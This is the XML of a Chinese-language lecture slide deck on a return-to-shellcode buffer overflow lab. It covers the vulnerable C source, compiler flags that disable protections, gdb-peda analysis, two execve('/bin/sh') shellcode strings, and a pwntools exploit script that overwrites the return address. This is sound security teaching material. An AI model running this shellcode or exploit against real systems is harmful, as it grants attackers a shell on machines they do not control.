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0" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="282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80" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="262" r:id="rId25"/>
    <p:sldId id="264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8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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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41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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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92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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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85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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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87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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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74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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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83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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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16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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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99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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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09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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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9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4783-ADDE-43F0-A63E-F52DB9A51701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60EB-DFF7-41A6-913D-5DF68EDC0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33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4783-ADDE-43F0-A63E-F52DB9A51701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060EB-DFF7-41A6-913D-5DF68EDC0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12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return2sc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Return to shell code</a:t>
            </a:r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488941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①②③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94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62" y="1492250"/>
            <a:ext cx="4653511" cy="34163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55662" y="2419350"/>
            <a:ext cx="2509838" cy="8890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045568" y="2419350"/>
            <a:ext cx="9813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./ret2sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a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2317750" y="2813050"/>
            <a:ext cx="3778191" cy="3111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1581150" y="2705100"/>
            <a:ext cx="717550" cy="15875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2298700" y="3949105"/>
            <a:ext cx="4572000" cy="516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1581150" y="3869730"/>
            <a:ext cx="717550" cy="15875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6870700" y="3257550"/>
            <a:ext cx="0" cy="69155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161466" y="4028480"/>
            <a:ext cx="23118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輸入的</a:t>
            </a:r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字串就存在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obj.name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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27376" y="458986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檢查此區</a:t>
            </a:r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塊是否可注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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可執行的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shell code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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1958636" y="3655418"/>
            <a:ext cx="5413714" cy="3016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372350" y="3516918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輸入的字串長度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708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3" y="1819275"/>
            <a:ext cx="3333750" cy="28765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67618" y="1542534"/>
            <a:ext cx="15528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./ret2sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Name:a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Try your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>best:s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9437" y="1962150"/>
            <a:ext cx="3235325" cy="105771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79436" y="3019862"/>
            <a:ext cx="3235325" cy="87268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3098800" y="3162737"/>
            <a:ext cx="2978150" cy="516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6076950" y="2921000"/>
            <a:ext cx="1" cy="24173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589584" y="3063237"/>
            <a:ext cx="20855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輸入的字串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>就存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>上的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>[local_20]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>區域變數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1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112" y="4070210"/>
            <a:ext cx="1812320" cy="1836770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直線單箭頭接點 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076950" y="3019862"/>
            <a:ext cx="0" cy="13931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2586167" y="3665551"/>
            <a:ext cx="1405388" cy="71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3981550" y="3641464"/>
            <a:ext cx="7951" cy="173979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430872" y="5405341"/>
            <a:ext cx="27770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gets()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接收輸入的字串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>==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可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>buffer overflow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15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7687" y="362635"/>
            <a:ext cx="786781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如何找到一段區間是程式可執行區段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gdb-peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟動程式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b main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r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vmmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>找到具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>==&gt; 0x00601000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0x00602000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是可以寫入 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88" y="3365993"/>
            <a:ext cx="8385810" cy="27893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7688" y="4015410"/>
            <a:ext cx="8385810" cy="20673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732865" y="1109225"/>
            <a:ext cx="489595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analysis == &gt; </a:t>
            </a:r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gdb-peda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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454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02" y="179030"/>
            <a:ext cx="4657748" cy="341405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88" y="3819217"/>
            <a:ext cx="8385810" cy="27893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7688" y="4468634"/>
            <a:ext cx="8385810" cy="20673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37902" y="992607"/>
            <a:ext cx="9813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./ret2sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a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1789043" y="1886058"/>
            <a:ext cx="4309607" cy="714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2330" y="2355775"/>
            <a:ext cx="866693" cy="24430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110524" y="3336820"/>
            <a:ext cx="4033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0x006010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TW" dirty="0" smtClean="0"/>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0x00602000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是可以寫入 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109565" y="2283349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0x006010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839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7486" y="577334"/>
            <a:ext cx="261719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./ret2sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW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3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Try your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>best:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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>
            <a:off x="2108200" y="1897345"/>
            <a:ext cx="18457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3254677" y="2879479"/>
            <a:ext cx="18457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68764" y="1666512"/>
            <a:ext cx="3493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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>後送出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217970" y="2531714"/>
            <a:ext cx="30675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 your best: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後送出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Buffer overflow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要蓋掉的部分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(0x20+0x8 = 0x28)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shellcode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的位址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76" y="3556835"/>
            <a:ext cx="2579150" cy="2613945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3783759" y="3630782"/>
            <a:ext cx="8172" cy="20849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606026" y="5957421"/>
            <a:ext cx="1911952" cy="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2426" y="5643344"/>
            <a:ext cx="2178657" cy="62815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Shell code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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1401057" y="6075144"/>
            <a:ext cx="2178657" cy="62815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Shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>address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370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/>
              <a:t>Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108954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shellcode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38559"/>
            <a:ext cx="7886700" cy="352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2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00264"/>
            <a:ext cx="7886700" cy="360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0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8031" y="5733533"/>
            <a:ext cx="6256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 smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> sc1.c -o sc1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009816" y="2436907"/>
            <a:ext cx="6854235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# include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>stdio.h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unsigned char shellcode[] = \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"\x50\x48\x31\xd2\x48\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";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 {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(*ret)() =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(*)())shellcode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  ret();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>}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3329" y="1910271"/>
            <a:ext cx="4681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Linux/x64 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) Shellcode (21 bytes)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0596" y="895770"/>
            <a:ext cx="7049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https://www.exploit-db.com/shellcodes/49770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98767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400" y="4530087"/>
            <a:ext cx="7880928" cy="19477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0400" y="1174048"/>
            <a:ext cx="78486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stdio.h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unsigned char shellcode[] = \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"\x48\x31\xf6\x56\x48\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";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(*ret)() =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(*)())shellcode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>    ret();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49518" y="347483"/>
            <a:ext cx="704994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https://www.exploit-db.com/shellcodes/46907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09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2983" y="4556097"/>
            <a:ext cx="2178657" cy="6281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RETURN ADDRESS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92983" y="3882712"/>
            <a:ext cx="2178657" cy="6281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Saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rbp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2982" y="3339547"/>
            <a:ext cx="2178657" cy="377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2982" y="2879208"/>
            <a:ext cx="2178657" cy="377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2982" y="2425130"/>
            <a:ext cx="2178657" cy="377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2981" y="1964791"/>
            <a:ext cx="2178657" cy="377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2981" y="1518193"/>
            <a:ext cx="2178657" cy="377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buffer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92980" y="1057854"/>
            <a:ext cx="2178657" cy="377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2878372" y="1518193"/>
            <a:ext cx="0" cy="29926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919457" y="1443620"/>
            <a:ext cx="32713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②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buffer overflow</a:t>
            </a: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一直蓋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saved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rbp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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492980" y="5315470"/>
            <a:ext cx="44971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③在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address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處填入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你的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code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位址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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4555130" y="3661662"/>
            <a:ext cx="439094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①將你的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code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注入到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程式可執行區段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直線單箭頭接點 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2671640" y="4870173"/>
            <a:ext cx="301354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788550" y="4617735"/>
            <a:ext cx="2178657" cy="62815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Shell code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323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 smtClean="0"/>
              <a:t>撰寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>exploit code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641451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92" y="2663438"/>
            <a:ext cx="8272737" cy="159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03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43" y="1045496"/>
            <a:ext cx="8608841" cy="416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54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 smtClean="0"/>
              <a:t>原始碼分析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077752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673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lab3/ret2sc.c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50017" y="1363502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stdio.h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char name[50];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setvbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(stdout,0,2,0);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("Name:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	read(0,name,50);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[20];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("Try your best:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	gets(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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	return ;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39755" y="5275659"/>
            <a:ext cx="5792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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ret2sc.c -o ret2sc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39756" y="5821685"/>
            <a:ext cx="5792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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ret2sc.c -o ret2sc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39756" y="6279364"/>
            <a:ext cx="638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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ret2sc.c -o ret2sc -no-pie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5059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062620" cy="724203"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>angelboy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>解答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76184" y="1332880"/>
            <a:ext cx="607082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#!/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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t># -*- coding: utf-8 -*-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pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> import *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host = "10.211.55.28"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port = 8888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r = remote(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>host,port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name = 0x804a060</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>r.recvuntil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(":")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>r.sendline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asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(shellcraft.sh()))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>r.recvuntil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(":")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>payload = "a"*32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>payload += p32(name)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>r.sendline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(payload)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r.interactive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597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2983" y="5017273"/>
            <a:ext cx="2178657" cy="6281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RETURN ADDRESS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92983" y="4343888"/>
            <a:ext cx="2178657" cy="6281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Saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rbp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2982" y="3800723"/>
            <a:ext cx="2178657" cy="377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2982" y="3340384"/>
            <a:ext cx="2178657" cy="377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2982" y="2886306"/>
            <a:ext cx="2178657" cy="377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2981" y="2425967"/>
            <a:ext cx="2178657" cy="377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2981" y="1979369"/>
            <a:ext cx="2178657" cy="377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buffer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92980" y="1519030"/>
            <a:ext cx="2178657" cy="377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2878372" y="1979369"/>
            <a:ext cx="0" cy="29926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085105" y="2190750"/>
            <a:ext cx="32713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②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buffer overflow</a:t>
            </a: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一直蓋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saved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rbp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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492980" y="5776646"/>
            <a:ext cx="44971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③在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address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處填入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你的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code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位址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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4555130" y="4122838"/>
            <a:ext cx="439094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①將你的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code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注入到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程式可執行區段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直線單箭頭接點 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2671640" y="5331349"/>
            <a:ext cx="301354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788550" y="5078911"/>
            <a:ext cx="2178657" cy="62815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Shell code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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270342" y="320526"/>
            <a:ext cx="795130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攻擊條件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>編譯時必須是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PIE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disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>關閉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nx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149982" y="1316601"/>
            <a:ext cx="39031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/>
              <a:t>PIE disable == &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>位址才會固定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>關閉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>nx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> == &gt; shell code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>才可以執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
